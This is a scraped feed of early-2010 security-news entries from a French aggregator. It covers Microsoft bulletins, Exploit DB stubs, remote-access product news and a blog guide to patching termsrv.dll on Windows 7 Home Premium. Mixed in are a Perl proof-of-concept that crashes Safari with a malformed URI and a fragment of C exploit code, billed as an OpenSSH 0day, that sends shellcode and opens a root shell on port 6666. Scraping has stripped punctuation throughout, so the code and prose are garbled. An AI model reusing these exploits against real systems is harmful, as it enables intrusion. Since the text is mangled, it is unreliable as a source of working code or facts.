if the attacker is on-link http://www.secuobs.com/revue/news/190173.shtmlhttp://www.secuobs.com/revue/news/190173.shtml 2010-02-09 21:30:26 - Microsoft Security Bulletins : Bulletin Severity Rating Important - This security update resolves several privately reported vulnerabilities in Microsoft Windows The most severe of these vulnerabilities could allow remote code execution if an attacker created a specially crafted SMB packet and sent the packet to an affected system Firewall best practices and standard default firewall configurations can help protect networks from attacks originating outside the enterprise perimeter that would attempt to exploit these vulnerabilities http://www.secuobs.com/revue/news/190170.shtmlhttp://www.secuobs.com/revue/news/190170.shtml 2010-02-09 21:30:26 - Microsoft Security Bulletins : Bulletin Severity Rating Critical - This security update resolves a privately reported vulnerability in Microsoft DirectShow The vulnerability could allow remote code execution if a user opened a specially crafted AVI file An attacker who successfully exploited this vulnerability could take complete control of an affected system An attacker could then install programs view, change, or delete data or create new accounts with full user rights Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights http://www.secuobs.com/revue/news/190169.shtmlhttp://www.secuobs.com/revue/news/190169.shtml 2010-02-09 14:41:46 - Exploit DB updates : http://www.secuobs.com/revue/news/190005.shtmlhttp://www.secuobs.com/revue/news/190005.shtml 2010-02-09 03:32:41 - SANS Internet Storm Center InfoCON green : more http://www.secuobs.com/revue/news/189855.shtmlhttp://www.secuobs.com/revue/news/189855.shtml 2010-02-08 06:08:31 - Exploit DB updates : http://www.secuobs.com/revue/news/189507.shtmlhttp://www.secuobs.com/revue/news/189507.shtml 2010-02-07 22:00:33 - Exploit DB updates : http://www.secuobs.com/revue/news/189452.shtmlhttp://www.secuobs.com/revue/news/189452.shtml 2010-02-07 22:00:33 - Exploit DB updates : http://www.secuobs.com/revue/news/189451.shtmlhttp://www.secuobs.com/revue/news/189451.shtml 2010-02-07 19:10:25 - Lostmon Blogger : A malformed http domain name , can cause that safari turn in a infinite loop wen try to resolve this domain, and it can cause at memory level a access violation wen try to write a secction that contains unknow data See Safari_httpDoSPocpl file to demostrate it AppName safariexe AppVer 3525271 ModName safariexe ModVer 3525271 Offset 00089394 IMAGE usr bin perl Safari_httpDoSPocpl Safari for Windows 321 Remote http uri handler DoS Lostmon Lostmon gmailcom http lostmonblogspotcom archivo ARGV 0 if defined archivo print Uso 0 n cabecera Safari 321 for windows Browser Die PoC By Lostmon n codigo Safari 321 for windows Browser Die PoC By Lostmon lostmon gmailcom http lostmonblogspotcom This PoC is a malformed http URI, this causes that safari for windows turn inestable and unresponsive Click THIS link Safari Die or this other Safari Die piepag datos cabecera codigo piepag open FILE, '' archivo print FILE datos close FILE exit Thnx To estrella to be my ligth Thnx to all who belive in me -- atentamente Lostmon lostmon gmailcom Web-Blog http lostmonblogspotcom Google group http groupsgooglecom group lostmon new -- La curiosidad es lo que hace mover la menteLostmon lostmon gmailcom Web-Blog http lostmonblogspotcom Google group http groupsgooglecom group lostmon new -- La curiosidad es lo que hace mover la mente http://www.secuobs.com/revue/news/189416.shtmlhttp://www.secuobs.com/revue/news/189416.shtml 2010-02-07 14:32:26 - Exploit DB updates : http://www.secuobs.com/revue/news/189367.shtmlhttp://www.secuobs.com/revue/news/189367.shtml 2010-02-07 13:02:06 - PenTestIT : This is an unreleased, private 0day, which we found on an un-secure of a person who was trying to root us Use it on your own production environment and handle with care We should not be held responsible for damages occurring out of the use of this source code OpenSSH is a FREE version of the SSH IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/189359.shtmlhttp://www.secuobs.com/revue/news/189359.shtml 2010-02-06 21:51:56 - Exploit DB updates : http://www.secuobs.com/revue/news/189302.shtmlhttp://www.secuobs.com/revue/news/189302.shtml 2010-02-05 20:19:59 - Exploit DB updates : http://www.secuobs.com/revue/news/189064.shtmlhttp://www.secuobs.com/revue/news/189064.shtml 2010-02-05 19:09:58 - Exploit DB updates : http://www.secuobs.com/revue/news/189037.shtmlhttp://www.secuobs.com/revue/news/189037.shtml 2010-02-04 23:48:45 - Exploit DB updates : http://www.secuobs.com/revue/news/188746.shtmlhttp://www.secuobs.com/revue/news/188746.shtml 2010-02-04 18:11:11 - Exploit DB updates : http://www.secuobs.com/revue/news/188616.shtmlhttp://www.secuobs.com/revue/news/188616.shtml 2010-02-04 00:56:27 - Hack In The Box : A bug in the design of the Oracle database -- the world's top-selling software for storing electronic information -- could allow hackers to break into private databases via the Internet, said David Litchfield, chief research scientist of NGSSoftware Ltd, a UK-based computer security company It allows an attacker without a user ID and password to take complete control All firewalls become irrelevant, Litchfield said on Wednesday after presenting his research at the Black Hat hacking conference in Washington Litchfield said that he warned Oracle of the problem in November, hoping that the company would fix the flaw when it issued a group of quarterly security patches in January http://www.secuobs.com/revue/news/188372.shtmlhttp://www.secuobs.com/revue/news/188372.shtml 2010-02-03 10:56:36 - Rootsecure.net : Threat Post iPhones Vulnerable to New Remote Attack http://www.secuobs.com/revue/news/188059.shtmlhttp://www.secuobs.com/revue/news/188059.shtml 2010-02-03 02:59:26 - securitystream.info : Beware of rogue config files Apple's iPhone is vulnerable to exploits that allow an attacker to spoof web pages even when they're protected by the SSL, or secure sockets layer, protocol, a security researcher said Web threats Why conventional protection doesn't work Related posts 1 Attack exploits just-patched Mac security bug 2 iPhones Vulnerable to New Remote Attack 3 Researcher busts into Twitter via SSL reneg hole http://www.secuobs.com/revue/news/187966.shtmlhttp://www.secuobs.com/revue/news/187966.shtml 2010-02-03 02:28:30 - SANS Internet Storm Center InfoCON green : This vulnerability CVE-2010-0440 could allow an unauthenticated, remote attacker to conduct cross- more http://www.secuobs.com/revue/news/187961.shtmlhttp://www.secuobs.com/revue/news/187961.shtml 2010-02-02 20:07:05 - threatpost The First Stop for Security News : There are several flaws in the way that the iPhone handles digital certificates which could lead to an attacker being able to create his own trusted certificate and entice users into downloading malicious files onto their iPhones Shorten URL http threatpostcom en_us 3U3 Click to copy to clipboard or post to Twitter http://www.secuobs.com/revue/news/187830.shtmlhttp://www.secuobs.com/revue/news/187830.shtml 2010-02-02 03:01:19 - Exploit DB updates : http://www.secuobs.com/revue/news/187560.shtmlhttp://www.secuobs.com/revue/news/187560.shtml 2010-02-01 09:18:55 - Reverse Engineering : submitted by rolfr link comment http://www.secuobs.com/revue/news/187193.shtmlhttp://www.secuobs.com/revue/news/187193.shtml 2010-01-30 13:58:56 - Exploit DB updates : http://www.secuobs.com/revue/news/186960.shtmlhttp://www.secuobs.com/revue/news/186960.shtml 2010-01-30 07:37:40 - Exploit DB updates : http://www.secuobs.com/revue/news/186911.shtmlhttp://www.secuobs.com/revue/news/186911.shtml 2010-01-29 18:22:11 - Channel 9 : IMAGE As a remote employee, I'll do anything to make my job easier and more importantly, to get folks at work to REMEMBER THAT I'M OUT HERE You can only do so much with Video Chat I just wish I had a physical presence on campus Well, the folks at MSR Microsoft Research are doing some research into what they call Embodied Social Proxies Basically, how will a team's relationship with a remote work change if there is a physical stand-in er, Embodied Social Proxy that they can interact with It's more than just a table with a webcam Check out the video http://www.secuobs.com/revue/news/186703.shtmlhttp://www.secuobs.com/revue/news/186703.shtml 2010-01-28 11:11:53 - Rootsecure.net : Net Security phpMyAdmin unserialize Remote Code Execution http://www.secuobs.com/revue/news/186213.shtmlhttp://www.secuobs.com/revue/news/186213.shtml 2010-01-27 18:15:30 - Exploit DB updates : http://www.secuobs.com/revue/news/185920.shtmlhttp://www.secuobs.com/revue/news/185920.shtml 2010-01-27 17:11:05 - Exploit DB updates : http://www.secuobs.com/revue/news/185894.shtmlhttp://www.secuobs.com/revue/news/185894.shtml 2010-01-27 12:21:38 - Help Net Security News : Array Networks launched the DesktopDirect iPhone Client, the first iPhone application for enterprise remote desktop access Employees now have full-feature access on the iPhone to their Windows-based http://www.secuobs.com/revue/news/185768.shtmlhttp://www.secuobs.com/revue/news/185768.shtml 2010-01-26 23:40:01 - Exploit DB updates : http://www.secuobs.com/revue/news/185600.shtmlhttp://www.secuobs.com/revue/news/185600.shtml 2010-01-26 23:40:01 - Exploit DB updates : http://www.secuobs.com/revue/news/185599.shtmlhttp://www.secuobs.com/revue/news/185599.shtml 2010-01-26 18:36:04 - Exploit DB updates : http://www.secuobs.com/revue/news/185494.shtmlhttp://www.secuobs.com/revue/news/185494.shtml 2010-01-26 01:29:11 - Exploit DB updates : http://www.secuobs.com/revue/news/185259.shtmlhttp://www.secuobs.com/revue/news/185259.shtml 2010-01-26 00:43:59 - TorrentFreak : Many sites support RSS feeds nowadays, but these are impossible to tweak or optimize ReactorFeed makes it very easy to create and manage your personal torrent RSS feed, allowing you to add torrents to your BitTorrent client remotely http://www.secuobs.com/revue/news/185237.shtmlhttp://www.secuobs.com/revue/news/185237.shtml 2010-01-25 02:33:19 - Exploit DB updates : http://www.secuobs.com/revue/news/184960.shtmlhttp://www.secuobs.com/revue/news/184960.shtml 2010-01-23 04:23:47 - 4sysops : Submitted by Doug Z Remote Reboot X is very useful for sys admins to install updates on MANY remote computers simultaneously and then reboot them all with real-time monitoring The tool works in conjunction with WSUS, so if you have a WSUS server or use Microsoft s update server but need precise control over when your computers http://www.secuobs.com/revue/news/184700.shtmlhttp://www.secuobs.com/revue/news/184700.shtml 2010-01-23 01:58:32 - Exploit DB updates : http://www.secuobs.com/revue/news/184673.shtmlhttp://www.secuobs.com/revue/news/184673.shtml 2010-01-23 01:58:32 - Exploit DB updates : http://www.secuobs.com/revue/news/184671.shtmlhttp://www.secuobs.com/revue/news/184671.shtml 2010-01-23 01:58:32 - Exploit DB updates : http://www.secuobs.com/revue/news/184669.shtmlhttp://www.secuobs.com/revue/news/184669.shtml 2010-01-23 01:58:32 - Exploit DB updates : http://www.secuobs.com/revue/news/184668.shtmlhttp://www.secuobs.com/revue/news/184668.shtml 2010-01-22 21:21:34 - What's New Cenzic Security Blog : Weekly product update Cenzic detects a Java System Web Server Remote Code Execution Vulnerability As of January 22, 2010 Cenzic now detects a Java System Web Server Remote Code Execution Vulnerability BugtraqID 37641 Sun Java System Web Server is prone to a remote code execution vulnerability Attackers can exploit this issue to execute code within the context of the affected application Sun Java System Web Server 70 Update 6 is vulnerable, however other versions may also be affected Background on Cenzic s SmartAttacks Every week, Cenzic s suite of products is updated with the latest vulnerabilities custom, commercial, and open-source to better detect holes in Web applications These Web application vulnerabilities include but not limited to cross site scripting, buffer overflow, path or directory traversal, SQL injection, HTTP response splitting, and other workflow types by Erin Swanson Eswanson cenziccom See Also Java System Web Server Remote Code Execution Vulnerability Learn more about this vulnerability on Security Focus http://www.secuobs.com/revue/news/184574.shtmlhttp://www.secuobs.com/revue/news/184574.shtml 2010-01-22 16:41:54 - Exploit DB updates : http://www.secuobs.com/revue/news/184478.shtmlhttp://www.secuobs.com/revue/news/184478.shtml 2010-01-22 03:51:31 - Exploit DB updates : http://www.secuobs.com/revue/news/184294.shtmlhttp://www.secuobs.com/revue/news/184294.shtml 2010-01-22 02:45:37 - Exploit DB updates : http://www.secuobs.com/revue/news/184278.shtmlhttp://www.secuobs.com/revue/news/184278.shtml 2010-01-22 02:04:21 - Unix Cisco Hacks : En una entrada, admin me preguntaba si conocia un supuesto 0-day de ssh Se ha quitado algo para que no compile Te refieres a este Ver los comentarios antes de ejecutar el exploit --------------------------- OpenSSH h_addr sock socket PF_INET, SOCK_STREAM, 0 addrsin_port htons port addrsin_family AF_INET if connect sock, struct sockaddr addr, sizeof addr -1 printf - Connecting failed n return 1 payload malloc limit 10000 ptr payload 8 memcpy ptr,jmpcode,strlen jmpcode jmpinst fopen shellcode 793, w if jmpinst fseek jmpinst,0,SEEK_SET fprintf jmpinst, pourcentss ,shellcode fclose jmpinst ptr strlen jmpcode if target 5 target 6 memcpy ptr,shellcode,strlen shellcode ptr strlen shellcode memset ptr,'B',limit 10000 - 8 - strlen shellcode else memcpy ptr,fbsd_shellcode,strlen fbsd_shellcode ptr strlen fbsd_shellcode memset ptr,'B',limit 10000 - 8 - strlen fbsd_shellcode send sock,buffer,strlen buffer ,0 send sock,ptr,3750,0 close sock if connect sock, struct sockaddr addr, sizeof addr -1 printf - connecting failed n payload sizeof payload -1 ' 0' payload sizeof payload -2 ' 0' send sock,buffer,strlen buffer ,0 send sock,payload,strlen payload ,0 close sock free payload addrsin_port htons 6666 if connect sock, struct sockaddr addr, sizeof addr 0 v--- our cool bar that says r0000000t printf n n n fremote PS1 'sh-32 ' bin sh else printf - failed to exploit target - n close sock return 0 IMAGE http://www.secuobs.com/revue/news/184268.shtmlhttp://www.secuobs.com/revue/news/184268.shtml 2010-01-20 12:10:29 - xiom.com The Web Application Firewalls Information Center : A remote command injection vulnerability was found in Applicure's dotDefender WAF management console The vulnerability allows an authenticated dotDefender manager to execute arbitrary commands on the protected server Exploiting the vulnerability requires to first authenticate to the server, lowering its potential risk http://www.secuobs.com/revue/news/183585.shtmlhttp://www.secuobs.com/revue/news/183585.shtml 2010-01-19 21:02:18 - xorl eax eax : I was requested by a reader via email to write about this vulnerability, so here is my post So, first of all the bug affects OpenSSL 098l and earlier and 100 Beta through Beta 4 as we can read in the CVE-2009-4355 name assigned The vulnerability was discovered by a user and it was initially reported http://www.secuobs.com/revue/news/183206.shtmlhttp://www.secuobs.com/revue/news/183206.shtml 2010-01-19 19:46:00 - Exploit DB updates : http://www.secuobs.com/revue/news/183178.shtmlhttp://www.secuobs.com/revue/news/183178.shtml 2010-01-19 13:17:41 - SecurityPark.net : The residents of Cambridge elect 42 councillors across 14 wards, who are responsible for setting the budget and policy framework in the city Backing up every decision and policy change is a workforce of hundreds of employees who ensure that any decisions made by the council are successfully implemented at a practical level In order to ensure that the council's civic responsibility can be met, more http://www.secuobs.com/revue/news/183072.shtmlhttp://www.secuobs.com/revue/news/183072.shtml 2010-01-19 03:48:16 - Exploit DB updates : http://www.secuobs.com/revue/news/182976.shtmlhttp://www.secuobs.com/revue/news/182976.shtml 2010-01-19 02:46:03 - Exploit DB updates : http://www.secuobs.com/revue/news/182966.shtmlhttp://www.secuobs.com/revue/news/182966.shtml 2010-01-18 14:54:55 - SecurityPark.net : Network Defence is enabling non-remote employees to work quickly and securely from any location with the AppGate in case of emergency ICE licence The remote access solution helps companies avoid the cost of staff absenteeism and maintain effective business operations in case of emergency situations The solution, which is based on an AppGate remote access platform with an ICE licence, provid more http://www.secuobs.com/revue/news/182723.shtmlhttp://www.secuobs.com/revue/news/182723.shtml 2010-01-18 01:31:11 - Exploit DB updates : http://www.secuobs.com/revue/news/182609.shtmlhttp://www.secuobs.com/revue/news/182609.shtml 2010-01-17 22:55:57 - Exploit DB updates : http://www.secuobs.com/revue/news/182566.shtmlhttp://www.secuobs.com/revue/news/182566.shtml 2010-01-17 21:53:36 - Exploit DB updates : http://www.secuobs.com/revue/news/182558.shtmlhttp://www.secuobs.com/revue/news/182558.shtml 2010-01-17 18:35:35 - Exploit DB updates : http://www.secuobs.com/revue/news/182536.shtmlhttp://www.secuobs.com/revue/news/182536.shtml 2010-01-16 17:59:15 - Exploit DB updates : http://www.secuobs.com/revue/news/182414.shtmlhttp://www.secuobs.com/revue/news/182414.shtml 2010-01-16 17:59:15 - Exploit DB updates : http://www.secuobs.com/revue/news/182413.shtmlhttp://www.secuobs.com/revue/news/182413.shtml 2010-01-16 17:59:15 - Exploit DB updates : http://www.secuobs.com/revue/news/182411.shtmlhttp://www.secuobs.com/revue/news/182411.shtml 2010-01-16 15:34:13 - Exploit DB updates : http://www.secuobs.com/revue/news/182388.shtmlhttp://www.secuobs.com/revue/news/182388.shtml 2010-01-15 21:05:09 - New RFCs : 28KB This document lists IANA Considerations for Remote Procedure Call RPC Network Identifiers netids and RPC Universal Network Addresses uaddrs This document updates, but does not replace, RFC 1833 STANDARDS TRACK http://www.secuobs.com/revue/news/182156.shtmlhttp://www.secuobs.com/revue/news/182156.shtml 2010-01-15 21:05:09 - New RFCs : 82KB This document describes a protocol providing Remote Direct Memory Access RDMA as a new transport for Remote Procedure Call RPC The RDMA transport binding conveys the benefits of efficient, bulk-data transport over high-speed networks, while providing for minimal change to RPC applications and with no required revision of the application RPC protocol, or the RPC protocol itself STANDARDS TRACK http://www.secuobs.com/revue/news/182155.shtmlhttp://www.secuobs.com/revue/news/182155.shtml 2010-01-14 21:38:44 - Exploit DB updates : http://www.secuobs.com/revue/news/181697.shtmlhttp://www.secuobs.com/revue/news/181697.shtml 2010-01-14 06:15:59 - xorl eax eax : This vulnerability was discovered by Olli Jarva and Tuomo Untinen from the CROSS project at Codenomicon Ltd as we can read in David Miller s email to the linux-netdev mailing list The issue affects only kernels build with network namespaces option CONFIG_NET_NS enabled Anyway, let s have a look at the actual code as seen in 2632 http://www.secuobs.com/revue/news/181435.shtmlhttp://www.secuobs.com/revue/news/181435.shtml 2010-01-14 01:11:57 - Hack In The Box : Without a strategic vision for remote control security, organizations will continue to fall prey to hackers who take advantage of IT support departments' growing use of remote access tools Here, Knowledge Center contributor Nathan McNeill outlines five ways to maintain security and corporate governance policies while relying on remote access technology to support off-site computing devices Worker mobility and technological complexity in today's enterprise are driving the increased demand for IT support departments Even though IT has used remote control tools to troubleshoot PC issues for some time, there is a renewed interest in the technology to provide anytime, anywhere support to both disparate users and backend systemsâ regardless of firewalls However, a significant concern has emerged around whether traditional remote access software such as pcAnywhere and RDP can be locked down to ensure optimal levels of security Consider this the Verizon Business RISK team issued a report in 2008 detailing its forensic investigation into over 500 actual data breaches between 2003 and 2007 A key area examined was the attack pathways hackers used to gain access to confidential data The report discovered several areas of concern that IT security administrators typically expect to see such as Website vulnerabilities and unsecured wireless hot spots http://www.secuobs.com/revue/news/181343.shtmlhttp://www.secuobs.com/revue/news/181343.shtml 2010-01-13 18:20:42 - Exploit DB updates : http://www.secuobs.com/revue/news/181197.shtmlhttp://www.secuobs.com/revue/news/181197.shtml 2010-01-13 04:34:59 - xorl eax eax : Since I didn t find any cool public bug to write about, I ll blog about one of the most historical remote exploits since it was the first public, remotely exploitable vulnerability in OpenBSD So Here is the story The bug was discovered by some anonymous person and it was exploited by three amazingly awesome coders The two http://www.secuobs.com/revue/news/180962.shtmlhttp://www.secuobs.com/revue/news/180962.shtml 2010-01-12 21:59:37 - Microsoft Security Bulletins : Bulletin Severity Rating Critical - This security update resolves a privately reported vulnerability in Microsoft Windows The vulnerability could allow remote code execution if a user viewed content rendered in a specially crafted Embedded OpenType EOT font in client applications that can render EOT fonts, such as Microsoft Internet Explorer, Microsoft Office PowerPoint, or Microsoft Office Word An attacker who successfully exploited this vulnerability could take complete control of an affected system An attacker could then install programs, view, change, or delete data, or create new accounts with full user rights Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights http://www.secuobs.com/revue/news/180799.shtmlhttp://www.secuobs.com/revue/news/180799.shtml 2010-01-12 17:15:34 - Exploit DB updates : http://www.secuobs.com/revue/news/180705.shtmlhttp://www.secuobs.com/revue/news/180705.shtml 2010-01-12 11:35:45 - Just ask Gemalto : One way to access your cell phone data remotely is with Web-based contact management, included as part of a backup service AT T and T-Mobile call it Mobile Backup, and at Verizon it is called Backup Assistant, for example With this extra-cost service, you can remotely access and edit your contacts over the Web Another option is to synchronize your email, contacts and calendar between your phone and your PC or Web mail Many cell phones today have these capabilities, as do all smartphones read more http://www.secuobs.com/revue/news/180600.shtmlhttp://www.secuobs.com/revue/news/180600.shtml 2010-01-11 23:10:35 - SANS Internet Storm Center InfoCON green : more http://www.secuobs.com/revue/news/180411.shtmlhttp://www.secuobs.com/revue/news/180411.shtml 2010-01-11 22:43:31 - Exploit DB updates : http://www.secuobs.com/revue/news/180400.shtmlhttp://www.secuobs.com/revue/news/180400.shtml 2010-01-11 17:50:11 - Exploit DB updates : http://www.secuobs.com/revue/news/180267.shtmlhttp://www.secuobs.com/revue/news/180267.shtml 2010-01-11 17:50:11 - Exploit DB updates : http://www.secuobs.com/revue/news/180264.shtmlhttp://www.secuobs.com/revue/news/180264.shtml 2010-01-11 17:50:11 - Exploit DB updates : http://www.secuobs.com/revue/news/180263.shtmlhttp://www.secuobs.com/revue/news/180263.shtml 2010-01-11 02:11:06 - grand stream dreams : reposted and re-edited here for clarity and blog-time continuum harmony I get it now Kevin if you are still reading this blog - Gentle readers it has come to my attention via the comments that the post title and content in the following and now updated Grand Stream Dreams post Run Windows Remote Desktop Connection on Win7 Home editions Updated - Grand Stream Dreams might be a bit misleading That was not my intention, but after careful and objective reading of the post now, I clearly find that was the case To that end I want to make some important clarifications Then, if you want to carry the Windows 7 RDC client binaries on your USB stick for whatever clever reason you need them for, please go on and read that post 1 My original desire in that post was twofold a Run Windows RDC from my Windows 7 Home Premium laptop to control my desktop faux-server Windows 7 system currently running Win7 Ultimate RC1 , and b Be able to use the final Win7 RDC binaries at work on my XP Pro system to RD some XP Pro systems If that sounds like what you are interested in doing and or what the post title and or Google led you here for then read these bits if you are curious and then hop over to that previous post If not and you really do want to set up hack patch your Windows 7 Home Premium to run RDC with a host-mode service not natively supported by Microsoft in that version, then keep reading down to item 5 below before deciding to stay or leave this post you might be rewarded for doing so 2 The original nomenclature I had used previously to refer to host and client in RDC was incorrect or at least, muddled Here is the official definitions per Microsoft Remote Desktop Connection is a technology that allows you to sit at a computer sometimes called the client computer and connect to a remote computer sometimes called the host computer in a different location So the PC you are working at that you are initiating the RDC session from is the client end and the one you are actually remote-controlling is the host end M kay 3 As the table below shows but is a bit misleading without the above information ALL versions of Windows 7 allow you to run the Windows 7 RDC client natively That s why as some commenters pointed out the binaries I noted are actually present on all the Win7 systems So following the earlier post instructions really are not necessary UNLESS you want to run the Windows 7 RDC client binaries from a non-Win7 system XP Vista Server and do so from a USB stick unless you then offload them to that system locally image creator unknown original image here Comment please and I will give credit 4 Based on 3 above, you just don t need to do the solution patch hack in this post UNLESS you mean to say you want to run Windows Remote Desktop on Windows 7 Home Premium as the HOST Then without following the steps in this post, you would be completely helpless at least as far as using the specific tool Microsoft RDC per the official Microsoft product description for Win 7 RDC You can connect to computers running Windows 7 Professional, Windows 7 Ultimate, or Windows 7 Enterprise You can't use Remote Desktop Connection to connect to computers running Windows 7 Starter, Windows 7 Home Basic, or Windows 7 Home Premium Only you actually can with Windows 7 Home Premium x32 or x64 If that is what you came here looking for continue on to see item 5 below 5 To REALLY run Windows RDC in host-mode on a Windows 7 Home Premium system you will need to perform the following steps Last course-correction warning If all you want to do is just remote control another system to help a friend or mate or distant relative out, please look to the very end of this post as there are some great freeware solutions to do so without any mucking around and hacking patching of Windows System 32 files that this requires and brings with it possible heartbreak and system-break The Patch Hack to enable Windows 7 Home Premium to run Windows Remote Desktop Connection as a HOST service Note ONLY do this if you understand what you are doing, what the consequences are, and will accept and adopt as your own blood any security issues or system-stability consequences that might arise if you decide to do this Pet hamsters might escape their cages You might Black or Blue Screen of Death your Windows 7 Home Premium system that works just fine right now Seriously This really shouldn t even be considered by anyone except advanced or professional Windows users and administrators Seriously I mean it M kay Still want to do it Fine Keep reading then I warned you that here be dragons and you just wouldn t listen Probably want to start by manually making a System Restore Point On the Windows 7 Home Premium system, go to Start -- Control Panel System From that window, check the sidebar and find and select Remote settings on the left-hand side sidebar In the System Properties window select the Remote tab Check enable the Allow Remote Assistance connections to this computer Select Apply and OK Then close all the windows out Go to this page How to enable Remote Desktop in Windows 7 Home Premium over at the Tenniswood Blog and follow the link to download the zip file Unpack the zip file Concurrent_RDP_Win7_RTM_patcherzip Open up the unpacked folder and find the installcmd file and run it as administrator Note On my Windows 7 Home Premium x32 bit laptop it worked fine out of the box On my Win7 Home Premium x64 AMD system it errored out as it said the termsrvdll file didn t exist A CLI search for the file did find it present but cloaked by the OS in C Windows System32 So I had to then disable UAC, reboot, re-run the installcmd file as administrator It worked I then reset UAC and rebooted image You will need to decide if you wish to allow concurrent multiple sessions let a logged-on user work while you also work on it without force logging out the current user I select Y myself, image and if you want to enable blank password for account login not have to provide the password I select N for this image Once done and the process may take a while, particularly when it waits to listen to the service on port 3389 you will be directed to close the window out Then you are done image Your Windows 7 Home Premium system should now be patched to run RCD as a HOST for incoming RDC sessions Observations This is a hack patch mod of a Windows OS file along with some other automagical system configurations that changes the code of the termsrvdll file, adds the rdpclipexe file to the system, starts the service, and adds Windows Firewall Rules It is completely unsupported by Microsoft Future Service Pack release and or monthly OS security updates might overwrite and or break this whole house of cards I am a bit smart, but I am not a programmer and cannot certify that the documentation on file patching is all that goes on It might allow Martians to mind-control RDC your system I just don t know As far as I can tell everything seems legit and quite effective, but your mileage may vary Also, if you are running a non Windows Firewall solution, you might need to do some more firewall rule tweaking to get the inbound RDC connection session past your firewall Can t help you there Finally as mentioned in the second line of this post, I owe a GSD commenter to this post Kevin an apology Because my nomenclature was muddled up, I didn t quite get the tipoff he was trying to pass to me on this very technique Kevin s tip and information turned out to be MUCH more valuable granted to a really small set of Windows Home Premium users than I realized at the time including myself Great tip Kevin and a full hat tip to you, mate Patch Hack Extras How to enable Remote Desktop in Windows 7 Home Premium -Tenniswood Blog clean post to the zip file Windows 7 RTM concurrent remote desktop patch - The Green Button the Uber-team that seems to craft this out for each version of Windows Home OS time after time As far as I can tell, it all starts here Windows 7 Home Premium - Remote Desktop another RDC forum that pointed to the Tenniswood Blog post Install and Enable Remote Desktop in Windows XP Home Edition My Digital Life For XP Home Premium users seeking RDC Host enablement Enable Remote Desktop Connection on Vista Home Premium Frans goes Blog For Vista Home Premium users seeking RDC Host enablement Turn on Remote Desktop in Windows 7 or Vista - the How-To Geek for lucky folks who do have a version of Windows 7 or Vista that does support the Microsoft OEM enabled RDC Host feature it isn t enabled by default out of the box Freeware Solutions for Windows supported Remote Control Sessions non RDC based Probably most home users won t need Windows Remote Desktop Connection nor will or should they muck around with this patch no matter how effective, cool, or useful it might be Best left to advanced Windows users However, there are LOTS of easy to use and just more than effective solutions to set up a remote-desktop control sessions between two windows machines Like when you want to help that friend or relative out who is stuck on their PC but you don t want to drive across town in the dead of winter to do so even for free beer or pizza Check these solutions out Re Listed in a particular order to me ShowMyPC Still simply the easiest way to remote connect to a remote desktop to perform ad-hock connections and desktop control support Particularly for non-techie re family friends end-points TeamViewer Portable Lots of reasons I m thinking of moving to this application from ShowMyPC That will have to wait for a later post Offered by PortableAppscom so its perfectly portable software for your USB drive LogMeIn - Virtual Networking with LogMeIn Hamachi² along with Free Remote Access from LogMeIn and see also REMOTE DESKTOP WITH HAMACHI PLEASE READ link Mikogo provide free online meeting and desktop sharing that could be used for remote PC control support in a pinch Love the giraffe logo Comodo Easy VPN and the related page Secure Remote Access Zolved Free Remote Control not tried it yet personally but seems to get high marks in the blog-o-sphere for family friendly remote control connection building Shrew Soft Inc Software Yes it s really a VPN specific solution, but it looks really, really cool Chris Realm s Chris Control Looks like Chris has some older circa 07 WinPE 10 plugins for remote control building Not played with them yet but wanted to reference anyway Remote Control IntelliAdmin - Remote Administration For Windows -- I amost didn t list this one, but it is a good administrative level RC tool IntelliAdmin also provides some great freeware sysadmin utilities so check it out See also News and Tips Remote Control 43 Released Finally all recent Windows builds come with something most folks don t know called Remote Assistance or Easy Connect It s also pretty cool, free, and installed on all XP Vista Windows7 builds Windows 7 Easy Connect overview NeoWinnet Windows 7 Tips Easy Connect by Ankit Srivastava at iYogi iKnow, but it s a good post Remote Assistance in Windows 7 Lending a helping Hand is even easier - Windows Live Step-by-Step Guide to Remote Assistance Microsoft TechNet File transfer over network - Windows 7 Forums and this Homegroup problem to share files on another partition Microsoft forum post Sorry 'bout any confusion --Claus V http://www.secuobs.com/revue/news/180103.shtmlhttp://www.secuobs.com/revue/news/180103.shtml 2010-01-10 22:03:19 - Exploit DB updates : http://www.secuobs.com/revue/news/180058.shtmlhttp://www.secuobs.com/revue/news/180058.shtml 2010-01-10 22:03:19 - Exploit DB updates : http://www.secuobs.com/revue/news/180057.shtmlhttp://www.secuobs.com/revue/news/180057.shtml 2010-01-10 20:34:35 - Exploit DB updates : http://www.secuobs.com/revue/news/180044.shtmlhttp://www.secuobs.com/revue/news/180044.shtml 2010-01-10 16:16:11 - Salvatore Fresta : Based on one of the world's leading structure and content management systems - WebSiteAdmin, WSCreator WS standing for WebSite is powerful application for handling multiple websites http://www.secuobs.com/revue/news/179997.shtmlhttp://www.secuobs.com/revue/news/179997.shtml 2010-01-10 16:16:11 - Salvatore Fresta : VetPlus is a vet clinics system It currently manages Clients, Patients and users schedules appointments http://www.secuobs.com/revue/news/179996.shtmlhttp://www.secuobs.com/revue/news/179996.shtml 2010-01-10 09:21:20 - SecurityTube.Net : Remote Buffer Overflow Tutorial Windows Video Tutorial IMAGE http://www.secuobs.com/revue/news/179981.shtmlhttp://www.secuobs.com/revue/news/179981.shtml 2010-01-08 15:07:03 - Exploit DB updates : http://www.secuobs.com/revue/news/179598.shtmlhttp://www.secuobs.com/revue/news/179598.shtml 2010-01-08 14:17:45 - Exploit DB updates : http://www.secuobs.com/revue/news/179590.shtmlhttp://www.secuobs.com/revue/news/179590.shtml 2010-01-08 14:17:45 - Exploit DB updates : http://www.secuobs.com/revue/news/179588.shtmlhttp://www.secuobs.com/revue/news/179588.shtml 2010-01-08 14:11:54 - SecurityPark.net : According to the Federation of Small Businesses, up to three million people missed work because of the snow on Tuesday 5th January, costing businesses GBP600 million And the Centre for Economics and Business Research predicts that more than 2,000 companies could go bankrupt as a result of the cold snap Secure remote access technology is helping businesses all over the country to keep going as t more http://www.secuobs.com/revue/news/179582.shtmlhttp://www.secuobs.com/revue/news/179582.shtml 2010-01-08 10:04:07 - MS Digest IIS Exchange : The OCS team has now made a Remote Connectivity Analyzer, like we know from Exchange The tool is a great way of verifying that your remote access is configured properly The Office Communications Server Remote Connectivity Analyzer is a great tool for performing testing, troubleshooting, and diagnostics on OCS 2007 OCS 2007 R2 deployments The IMAGE http://www.secuobs.com/revue/news/179540.shtmlhttp://www.secuobs.com/revue/news/179540.shtml 2010-01-08 00:58:22 - The Exploitant : I usually don t just go and post exploits without much explanation I 